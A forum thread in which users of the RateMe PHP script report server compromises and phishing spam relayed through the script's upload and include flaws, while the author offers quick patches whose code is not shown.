|
|
BOARDS
Announcement
I had to clean the boards due to massive spam. Actually i deleted everything /-one after 1st Oct 2008. It was the only way to get this spam out of the boards. So i'm sorry for all serious users who registered/posted meanwhile.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
security exploit
My web host just informed me for the 2nd time in the past few months, that the script was used to send unsolicited emails. Is there a patch to fix any recent security issues anyone else has experienced?
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
I've communicated with one other user of this script and they indicated experiencing this security problem as well.
I'm not exactly sure how a hacker some how uses the script to send spam from my website server, in any event, Lukas replied to a recent email of mine indicating that it's not something he has the time to work on right now, but suggested that if I or anyone finds/writes a solution, they post it here.
Any help from another user familiar with the problem is much appreciated.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
Perhaps the following will shed light on the security problem (from an email from my webhost):
We have a firewall in place which monitors all activity; we can track and see which processes are running and there root path.
At the time of the exploit, this is what we found (listed below). As soon as we removed permissions to the “photo” folder; exploit immediately stopped. We had couple of processes running at the same time and massive amount of phishing email’s were being relayed through your account.
Here are the files which were being executed at the time.
/pathtoscript/photo/
OLDadmin.inc.php add.inc.php admin.inc.php edit.inc.php funcs.inc.php showres.inc.php
It appears CHMOD is not the issue with the script.
Last edited by jcliff (16-02-2007 20:31:51)
- martin
- Member
- Registered: 29-07-2005
- Posts: 12
Re: security exploit
I am the other user who contacted Lukas from planetluc regarding this issue.
My server was severely compromised due to the security hole in RATEME. Hackers were able to infiltrate my server, install hacks that would send out tons of spam containing links to phishing sites that they installed on my server through RATEME.
The hackers then installed additional hacks on my server which allowed them to view the entire directory of my server, all files, etc.
Users of RATEME should be informed about the severity of this issue.
The fact that the author of this script is not inclined to show support for this script clearly shows a lack of understanding on how serious the issue is. Further more, it also clearly shows that security is not an important issue for the author, which leads me to beleive serious security holes could very well be present in the other scripts sold on this website. And if they do, you will likely not receive support for any of your troubles...
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
RateMe is (better 'was') the only script on this server you had to pay for. Any other scripts are free. And maybe yes, maybe there are security lacks in those scripts, but you use those scripts on your own risk.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
Sure - I apologise for all inconveniences that occurred using this script. But let's be honest, you cannot expect a 16 dollar script to work as flawlessly and securely as a $200 script does. right?
When I did this script i could not consider all eventualities of a hacker to abuse it.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
Personally, I'm not nearly as disappointed in the fact that a security exploit existed. Shit happens and it's not like it was intended. The impact of being hacked sucks, but it happens, it's a constant battle on the web. It would be unfair and unrealistic to expect such a problem emerging not being possible.
I find the indifference expressed by the response of "I'm busy" much more troubling. Who's not busy?
Whether the script costs $1 or $100, whether future releases were planned or not, I find the notion that someone capable of authoring the script doesn't have even a mere matter of hours to at least investigate potential solutions, offer suggestions, collaborate with others that purchased the script, etc...well...irritating to be kind.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
Ok guys, lets try this as fix (i'm not too sure whether this solves all our problems but let's try).
1. open add.inc.php 2. goto line 23 and add before
this should at least check whether it is a JPG file that is being uploaded.
3. then we do about the same in edit.inc.php, so open it 4. go to line 26 and replace it by
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
no. the quick fix above does not cover this security hole.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
The '/forum/main.inc.html' script does not properly validate user-supplied input in the 'pathtoscript' parameter.
A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location.
As is, anyone that has purchased this script can no longer use it.
Is there any chance a modification to that one file could be provided?
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
well, another quick fix is:
- open the main.inc.php file - goto the beginning of the code, about line 14 - add following code block
- save it - upload it onto your server again
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
Thanks!
I've made the change and contacted my website hosting company to let them know we have something to test/run.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
ok, let us know, whether this works effectively.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
So far so good -- the script is working, and being monitored by my webost -- no reported hacks.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
- martin
- Member
- Registered: 29-07-2005
- Posts: 12
Re: security exploit
Hi guys, any news on this issue? I received an email a few weeks ago from jcliff mentioning that the fix listed above was not enough according to his server admins.
Here is something I have found: http://www.securityfocus.com/archive/1/454708
Luc, any idea how we could patch the script further to make it really secure?
I hate to insist, but I didn't find any other script out there that has the simplicity I need from rateme.
Thanks,
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
I've been informed by my webhost that the script has been exploited recently.
Has there been any modification to the code since the last problem?
Has anyone else experienced this problem (as I recall, the last time this began happening several sites had reports about the exploit and how it was happening)?
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
Excuse me, but I find it troubling to read new posts regarding the sale of this script, and I understand that ongoing support has been offered as some sort of "buyer beware" -- but with a known security issue (as has been linked previously in this thread months ago), I would think the issue would be addressed more promptly.
Is the "fix" at this point to merely hope that the script doesn't get hacked???
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
well the exploit desribed in the link 2 posts ago was fixed.
- jcliff
- Member
- Registered: 11-05-2006
- Posts: 18
Re: security exploit
admin wrote:well the exploit desribed in the link 2 posts ago was fixed.
I'll try to get more details in terms of how, but as it was explained to me by my webhost, they've shut the directory down in which the script was located because it was exploited again.
- admin
- Administrator
- From: Winterhur, Zurich, Switzerland
- Registered: 25-11-2004
- Posts: 462
- Website
Re: security exploit
...maybe some specific info from your hostsing company would help improving this script
|
|